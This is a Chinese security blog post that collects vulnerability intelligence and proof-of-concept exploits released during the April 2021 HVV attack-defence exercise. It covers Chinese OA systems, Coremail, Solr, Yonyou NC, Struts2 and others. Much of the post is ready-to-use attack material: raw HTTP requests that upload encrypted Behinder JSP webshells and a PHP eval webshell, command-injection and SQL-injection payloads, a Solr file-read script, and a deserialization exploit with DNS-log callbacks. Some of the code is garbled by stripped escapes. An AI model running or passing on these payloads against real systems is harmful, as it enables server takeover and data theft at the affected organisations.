2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)

  • A+
所属分类:安全文章

愿HVV开始之前的


0x01 志远OA任意用户登录


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


4月8号安全情报


4月8日15时,最新传出WPS-0day利用方式,通过点击触发WPS内置浏览器RCE
4月8日12时,有消息传出齐治堡垒机存在命令执行漏洞,poc疑似已流出
4月8日12时,网传深信服EDR存在命令执行漏洞,poc疑似已流出
4月8日12时,网传深信服VPN存在无条件RCE漏洞,poc疑似已流出
4月8日12时,网传jackson存在反序列化漏洞,poc疑似已流出
4月8日12时,网传CoreMai存在命令执行漏洞, poc疑似已流出
4月8日12时,网传用友NC6.5版本存在反序列化命令执行漏洞,poc疑似已流出
4月8日12时,网传dubbo存在反序列化命令执行漏洞,poc疑似已流出
4月8日12时,网传weblogic存在反序列化命令执行漏洞,poc疑似已流出
4月8日11时,网传和信创天云桌面系统全版本存在命令执行,文件上传,poc已流出
4月8日11时,网传红帆0A任意文件写入漏洞,poc疑似已流出
4月8日11时,网传exchange、 致远、shiro 存在0day漏洞,利用方式疑似已流出
4月8日11时,网传金蝶K3Cloud全版本存在命令执行,poc疑似已流出
4月8日11时,网传用友U8Cloud版本存在命令执行,poc疑似已流出
4月8日11时,网传h3c计算管理平台2016年版存在任意账户添加,poc疑似已流出
4月8日11时,网传启明星辰天清汉马USG防火墙存在逻辑缺陷,poc疑似已流出
4月8日10时,有消息传出天眼存在0day漏洞,poc已流出


0x02 dzzoffice 前台RCE


项目地址


https://github.com/zyx0814/dzzoffice/releases/


漏洞前提


首先需要获取到authkey 这个可以通过爆破或者其他的方式获取到具体的这个请看文章


我现在的环境的key为:3090dfHwzmw9lsC3


加密脚本



<?php function authcode_config($string,$key, $operation = 'DECODE', $expiry = 0){$ckey_length = 4;$key = md5($key);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string);
$result = '';$box = range(0, 255);
$rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}
for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}
for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}
if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc.str_replace('=', '', base64_encode($result));}}
echo base64_encode(authcode_config("disk::..././..././..././shell.php",md5('3090dfHwzmw9lsC3'),'ENCODE'));


输出的加密结果


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


构造数据包:



POST /core/api/wopi/index.php?access_token=1&action=contents&path=ZmM0OWp3bDgxbDE3WlhocFlCVUl4ZDFvRkNYeDRVaGtQbklJYlVSUjV2VjRzLzBwUkJ0Y051ZHl4QzVITFlvN205cENqZktDY1lyNHRQQ0pWblU= HTTP/1.1Host: word.comContent-Length: 18Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://word.comReferer: http://word.com/user.php?mod=loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
<?php phpinfo();?>

4月9号安全情报


0x03 JellyFin任意文件读取



GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1 GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1 GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09b f3d8f7 HTTP/1.1

0x04 帆软 V9getshell【历史漏洞】


FineReport V9


注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat


启动帆软后默认存在的 JSP 文件:


比如:/tomcat-7.0.96/webapps/ROOT/index.jsp


覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:



POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1 Host: 192.168.169.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Connection: close Accept-Au: 0c42b2f264071be0507acea1876c74 Content-Type: text/xml;charset=UTF-8 Content-Length: 675 
{"__CONTENT__":"<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null) {String k=(""+UUID.randomUUID()).replace("- ","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

0x05 泛微 OA 8 前台SQL注入


POC


http:


使用Payload查询数据库中sysadmin的密码


Select password as id from HrmResourceManager 
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%2
0id%20from%20HrmResourceManager


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x06 泛微 OA 9前台无限制getshell


漏洞位置:


/page/exportImport/uploadOperation.jsp


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


文件上传位置:


view-source:http:


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


wiki POC 

链接https://github.com/PeiQi0/PeiQi-WIKI-POC/commit/f5fb98b0cc2c9dcc9b8adce41479cf836265419a



POST /page/exportImport/uploadOperation.jsp HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 397Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3HcAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6dnt: 1x-forwarded-for: 127.0.0.1Connection: close------WebKitFormBoundary6XgyjB6SeCArD3HcContent-Disposition: form-data; name="file"; filename="peiqi.jsp"Content-Type: application/octet-stream<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>------WebKitFormBoundary6XgyjB6SeCArD3Hc--```
地址: /page/exportImport/fileTransfer/peiqi.jsp
默认密码 rebeyond

0x07 和信创天远程桌面命令执行



POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 Referer: x.x.x.x Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv Content-Length: 164
------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="1.png" Content-Type: image/avif 1------WebKitFormBoundaryfcKRltGv--

2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x08 默安蜜罐管理平台未授权问【官方辟谣】


漏洞信息


幻阵是默安科技首创的一款基于攻击混淆与欺骗防御技术的威胁检测防御系统,由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址,攻击者难以进行访问,且尽管可以访问也只能让幻阵执行ping指令,不会造成任何安全隐患。


漏洞危害


由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。


官方辟谣


默安科技关注到业内有人散布“默安科技幻阵管理后台存在认证绕过漏洞”的不实消息,特此作出如下说明。


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x09 天擎越权访问【官方辟谣】


POC


GET /api/dbstat/gettablessize HTTP/1.1


官方:近期,HVV期间泄露情报,在Web登录界面且未登录的情况下会显示提示信息,并且会涉及用户组织,功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口,不存在漏洞。


0x10 天擎前台SQL注入漏洞【历史漏洞】


PoC


https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop table O;--


利用方式


将首先创建新的数据库表,后将数据库内容更名为webshell的目标名,最后删除表清理痕迹。


官方辟谣


该漏洞为内部已知问题,并且在2020年护网前的版本已经修复。


0x11 天融信数据防泄漏系统(LDP)越权修改管理员密码【历史漏洞】


漏洞信息:


天融信数据防泄漏系统越权修改管理员密码,该漏洞为2020年8月17号收到历史情报,非近期HVV期间漏洞。


POC


默认用户superman的uid=1
POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1


2021HVV期间公布的部分漏洞及利用方式(部分附POC、EXP)


0x11 蓝凌OA任意写入漏洞


POC


/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]


0x12 禅道11.6 SQL注入【历史漏洞】


漏洞信息


11.6版本存在SQL注入漏洞,该漏洞为Nday ,非HVV期间0DAY


漏洞验证


注入来源于禅道采用的pathinfo,在以下URL中


http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user


对路径的解析为


getModel-<Model名字>-<Method名字>-<参数名字>=<参数的值>


0x13 Apache Solr 任意文件读取漏洞【历史漏洞】


漏洞信息


该漏洞是由于Apache Solr在默认安装时不会开启身份验证,攻击者在未授权情况下访问Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,进而通过构造恶意请求,执行SSRF攻击,读取目标服务器的任意文件。


影响范围


Apache Solr <= 8.8.1


POC


http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd  (db为存在的应用名)


POC2


http://ip//solr/db/debug/dump?param=ContentStreams(db为存在的应用名) 
POST提交:stream.url=file:///etc/passwd




import requestsimport jsonimport argparse
TIMEOUT = 20

def run(target: str, action: str): try: admin_url = target + "/solr/admin/cores?indexInfo=false&wt=json" response = requests.get(admin_url, verify=False, timeout=TIMEOUT) if response.status_code == 200 or "name" in response.text: data = json.loads(response.content) for i in data["status"]: key = data["status"][i]["name"] return attack(key, target, action) except Exception as e: error = "[-] {} run error:{}".format(target, str(e)) raise RuntimeError(error) return None

def attack(core_name: str, target: str, action: str): session = requests.session() config_url = target + "/solr/" + core_name + "/config" json_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}} response = session.post(config_url, data=json.dumps(json_data), timeout=TIMEOUT) if response and 200 != response.status_code: return None
dump_url = target + "/solr/" + core_name + "/debug/dump?param=ContentStreams" dump_data = {"stream.url": action} response = session.post(dump_url, data=dump_data, timeout=TIMEOUT) if response is None: return None elif 200 == response.status_code: content = json.loads(response.text) return content['streams'][0]['stream'] elif 500 == response.status_code: return response.text else: return None

if __name__ == '__main__': parser = argparse.ArgumentParser(description='Solr 任意文件下载漏洞POC.') parser.add_argument('-u',"--url", help='solr attack target', required=True) parser.add_argument('-a', '--action', help='file or url', required=True) args = parser.parse_args() print("[+] check {} ,action:get {}".format(args.url, args.action)) result = run(args.url, args.action) if result is None: print("[-] Not found vuln") print("[+] The result is as follows:n{}".format(result))

0x14 Apache solr SSRF(服务器端请求伪造)


影响版本


Apache Solr < 8.8.2


POC


/solr/db/replication?command=fetchindex&masterUrl=http://xxxx


参考链接


https://github.com/keven1z/SolrfilereadPOC


0x15 致远OA ajax.do 文件上传漏洞【历史漏洞】


漏洞信息


由于致远OA旧版本某些接口存在权限绕过漏洞,攻击者通过特制的HTTP请求将导致接口的权限机制被绕过,并结合某些接口功能实现在未授权情况下上传恶意文件,从而控制目标主机,经验证,该漏洞为2020年12月29日,致远官网发布的2020年10-12月安全通告中历史漏洞。


影响范围


致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x


POC



POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1Host: 127.0.0.1Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9loginPageURL=; login_locale=zh_CN;Content-Type: application/x-www-form-urlencoded
managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%60%0C%C3%BBQ%C2%96V%C2%9D%C2%87%C2%9F%C2%A0%C3%8C%C3%9D%C2%81%2C%C3%B0%10%C2%AA%3D%C3%98%C2%89%C3%A9%0D%C3%8CR%C3%A2rcVZ%06%C2%B9%2B%0A%C2%B7-%C2%AEel%C3%A8%2CU%16%C3%8C%C2%92r%C3%8D%C2%A5%01%C3%84%C3%B3%02%C3%B0z%C2%B1%C3%86J%C3%A9jc%C3%B98x%29%C2%8F%C3%A2%22%C2%B65%C3%89%C2%87X%27%C2%80C%C2%A5%1B%C2%B1%C3%A1F%1B%12%29%1A%3E%3B%C2%B1r%C3%9Db5%05X%C2%8F%C2%A0%C2%888%5B%13%C2%AE%C2%96%01%C2%91%24%C2%A2%1C%C2%88c%02k%7C%C2%BC%C3%A0%2CM%18%C3%90%C3%B7l%1D%26Y%C3%83%C2%9B%7Ea%C3%B1%2B%01%2C%C3%95%C3%B2S%19%C3%85%C2%B5%C2%8DM%21%C2%87R%C2%B9%C2%8B%C2%AA%7F%00%C3%BF%C3%B2%C3%8D%16%C3%B5%C3%88%15%17%C3%842%C3%95%C3%94%C3%A5%C2%86%C2%8F%C2%92%C2%A8d%C2%96%C2%A9%C3%9C%C2%A4%C3%85%C3%91%C2%B7%C3%8D%C2%80%C2%B5%0D%C3%A1%0C%C3%88dFun%C2%80%C2%ADJ%C3%8BP%11%C2%88s%5D%C2%9E%C2%B7z%07q%1CP%0C%22%C2%89%C2%9B%C3%94%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%959%C3%86%C3%86%C3%9FsU%00%C3%B8%C2%8Do%C2%93+%C3%B4L%15I%C2%8B%1CZ%21%1A%C3%91%C3%B8Xh%C2%AE%0Ai%C3%99%C3%9A%C2%AD%C2%B1%C2%8Al%C2%8C%0A%C3%BB%C3%98b%C3%8B%C2%A2%C2%94m%C2%A6U%C2%B8%C3%86%15r1d%C2%9D%C3%A9yt2%C3%99g%C2%9A%C3%93%3A%C3%AFg%C3%9B%C2%A8%C3%B5V%01%C3%8D%01%C3%8D%C3%9F%3Do%C2%B1%12%01%C2%8C%C2%AEP%C2%AC%10%C2%9C%09%07%C2%B8%5C%C2%A5.%06%C2%BEscC%C3%BB%C2%B0%1F%C3%98%C2%87%0D%C3%99%1A6%C2%B2%22%C3%BD%C2%BC%3DH%03%2B%C2%94F%C2%80%C3%93oM%0DB%C3%A1%0AM%C3%95%C2%B0%C2%8Cj%60k%7E%085%29s%C3%88y%C2%B4%C3%A7%C3%90%C3%95ic%1C%C2%BF%C3%91k%0C%11%C2%9C%23ZW5p%C2%B1%C2%82%C3%A4%C3%A9j%C2%A2%C3%AA%C2%9BP%3E%C3%A4%C3%91%C2%9A%C3%86%C3%A0%C2%98%C3%BBd%13V%C2%85m%02%C3%BF%C3%88%C3%A9Q%1D%C2%AB%C3%86%C3%A9%C3%82%C2%91%C2%9F+%C2%8B%C3%B8%C3%89%C2%87%3Fc%C3%BB%C3%97%3FS%C2%99H%C2%A1%C2%AC5%C3%B2i%C2%9D%2F%40%C3%BCt%C3%BD%C2%86%C2%AF%C2%9DG.%C3%96yZ%C2%9F%04%C2%8AA%0AH%C2%A3%C3%97%C3%96%C2%A7%C3%96k%C3%BC%C3%BA%C2%B56%C3%B2%C3%B4L%C3%A5+%C2%B1%C2%88pvY%C2%9B%C3%A6c%C2%91%C3%89%C2%A2%C2%80+%C2%99%C3%9C%C2%A01%2C%5C%03%C3%9D%C3%A8%C3%9Bt%C2%AF%2B%0B%25R%C3%A74%C2%AF%C3%A5%C3%9D%C2%AEh%C3%BA%C2%83S%C3%91%3E%C3%96%C2%B1M%7BU%5E%C2%AE%100u%04%C3%B8%7Das%3A%7B%C3%84%C3%BA%C3%9B%1F%05%C2%A8i%3A%C2%B3.%3E%26%C3%94%C3%8F%C2%94%C3%86%40%C3%A3%C2%87%2B7VX%C3%8B%10%22%1A%1F%C3%B5C%C2%AF%C2%A0%C2%B1%C3%88%00%09%C2%9A%C2%9E%C3%9Es%C3%A3%02%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7%10%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%A8Z%C2%B6u%5D%C2%95.%C2%BF%7F%7C%C2%9Fq%26%2B%C3%A2%3E%0E3%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07%12H%C3%87%1C%C3%9E%C3%AFv%C3%82%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFIq%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87-%C3%93o%18%14%C3%B7%3E%C2%82%C3%BF%C2%9F.%40I%C3%A6Q%C3%87%7E%7C%C2%AF%C2%B7+%25%C2%A0wb%C2%B2%C3%9C%C3%89C%C3%80TU%C3%95%7Bx%C3%AD%C3%BE%C2%A0%C2%AB%C2%91%C2%AE%C3%87%C3%97%C3%BA%C3%8E%2F%C2%85%C3%97%C3%BD%C3%BB_%2F%07M%C2%ADU%05%00%00

冰蝎3默认japx马pass:rebeyond


webshell地址:http://xxx.xxx.xxx.xxx/seeyon/mmd.jspx


成功返回


HTTP/1.1 500

{
"message":null,
"code":"0614448583",
"details":null
}


0x16 亿邮电子邮件系统远程命令执行


参考链接 https://github.com/Tas9er/EYouMailRCE


tools EYouMailRCE-master.zip


POC



POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1Host: 192.168.10.1Content-Length: 25Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfncAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0Connection: close
type='|cat /etc/passwd||'

0x17 其他漏洞信息


1、MYBB SQL 注入漏洞(CNVD-2021-25709)【可信度 100%】
MyBB 是᳿款免费的开源论坛软件。MyBB 1.8.26 之前版本的主题属性存在 SQL 注入漏洞。
3、用友 NC 1DAY 反序列化【可信度 100%】 
用友 NC 面向集团企业的世界级高端管理软件,发现存在任意文件上传漏洞,利用 apache commonscollections库可执行反序列化。
4、钓鱼邮件【可信度 100%】 
来源网络情报,发现钓鱼邮件内含有恶意 execl 文件,文件点击可造成远程控制等威胁,微步在线已验 证。 
        1)封禁 IP192.31.96.152;
        2)注意恶意邮件后缀@rainmetal.cn,不要点击此类邮件后缀发送的邮件。
5、和信创天云桌面命令执行漏洞任意文件上传【可信度 60%】 
和信下᳿代云桌面系统(VENGD),是国内领先的基于 NGD架构的桌面虚拟化 产品,它融合了 VDI、VOI、IDV 三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的 同时更能充分利用前端资源,和信下᳿代云桌面不仅可以满足随时随地移动办公的需求,更可以在窄带环 境下实现 3D 高清播放和外设硬件的全面兼容,满足大规模终端的管理、安全、运维需求。疑似和信创天 云桌面存在任意文件上传漏洞。
7、DZZOFFICE 最新版 RCE【可信度 100%】
    DzzOffice是一款开源的云存储与应用管理工具,主要可用于企业管理阿里云、亚马逊等云存储等空间, 把空间可视化分配给成员使用。发现最新版存在 RCE,经验证参数 bz 存在 SQL 注入漏洞。
8、深信服和致远 OA 文件上传漏洞情报【可信度 60%】 
    该情报属于网络情报暂无相关细节进行验证。
9、F5 BIG-IP 16.0.X-ICONTROL REST 远程代码执行【可信度 100%】
F5 BIG-IP 是美国 F5 公司的᳿款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平 台。F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过 BIG-IP 管理界面和自身 IP 地址对iContronl REST 接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。
10、多款 HUAWEI 产品内存泄露漏洞【可信度 100%】 
Huawei IPS Moudule 等都是中国华为(Huawei)公司的产品。Huawei IPS Moudule 是一款入侵防御系统 (IPS)模块。NGFW Moudule 是一款下一代防火墙(NGFW)模块。Secospace USG6600 是᳿款下一代防 火墙产品。多款 Huawei产品存在内存泄露漏洞。由于产品在某些场景下对内存释放处理不当,远程攻击 者可能会发送特定报文来触发该漏洞。成功利用该漏洞可能导致服务异常。
11、通达 OA V11,7 在线任意用户登录【可信度 100%】 
通达 OA V11.7 版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外᳿个方面就 是编译在线的 瀈濼濷 值进行判断。
12、CVE-2021-21975:VREALIZE OPERATIONS MANAGER SSRF【可信度 100%】 
2021 年 3 月 31 日,VMWare 官方发布了 VMSA-2021-0004 的风险通告,漏洞编号为 CVE-2021-21975, CVE-2021-21983,漏洞等级:高危,漏洞评分 8.6。CVE-2021-21975:通过网络访问vRealize Operations Manager API 的恶意攻击者可以执行服务器端请求伪造攻击,以窃取管理凭据。


4月10号安全情报


0x18 用友NC 反序列化利用


漏洞关注点


/service/~xbrl/XbrlPersistenceServlet


EXP


import requestsimport threadpoolimport urllib3import sysimport base64ip = ""dnslog = "x79x37x64x70" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78"uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}req = requests.post("http:print (req.text)


0x19 用友NC协同管理软件存在目录遍历漏洞


漏洞关注点


/NCFindWeb?service=IPreAlertConfigService&filename=


0x20 金山终端安全系统 V8存在默认口令


默认口令


admin/admin


0x21 金山终端安全系统 V8/V9存在文件上传漏洞


漏洞关注点


dzz/shares/index.php


0x22 齐治堡垒机某版本任意用户登录


漏洞关注点


/audit/gui_detail_view.php


Fofa


app="齐治科技-堡垒机"


POC


/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm


0x23 Coremail 邮件系统任意文件上传漏洞【历史漏洞】


漏洞危害:


其特定版本范围内存在任意文件上传漏洞,攻击者可以上传webshell,从而造成远程代码执行。


影响范围


Coremail <= XT5.x


漏洞复现:


使用网上流传POC 进行验证 https://github.com/xiaoshu-bit/CoreMailUploadRce


pip3 install -r requirements.txt
python3 coremail_upload.py -u http://127.0.0.1:1111


文件上传poc:



POST /webinst/action.jsp HTTP/1.1Host: 120.136.129.10Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 99Connection: close
func=checkserver&webServerName=127.0.0.1:6132/%[email protected]/home/coremail/web/webapp/justtest.jsp%20JUSTTEST


上传文位置:http://ip:port/coremail/justtest.jsp

0x24 Apache Struts2补丁绕过0day(实际为S2-052)【无POC】


影响版本


2.1.1到2.3.x之前的2.3.x和2.5.13之前的2.5.x


漏洞关注点:


com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource


原exp



<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> 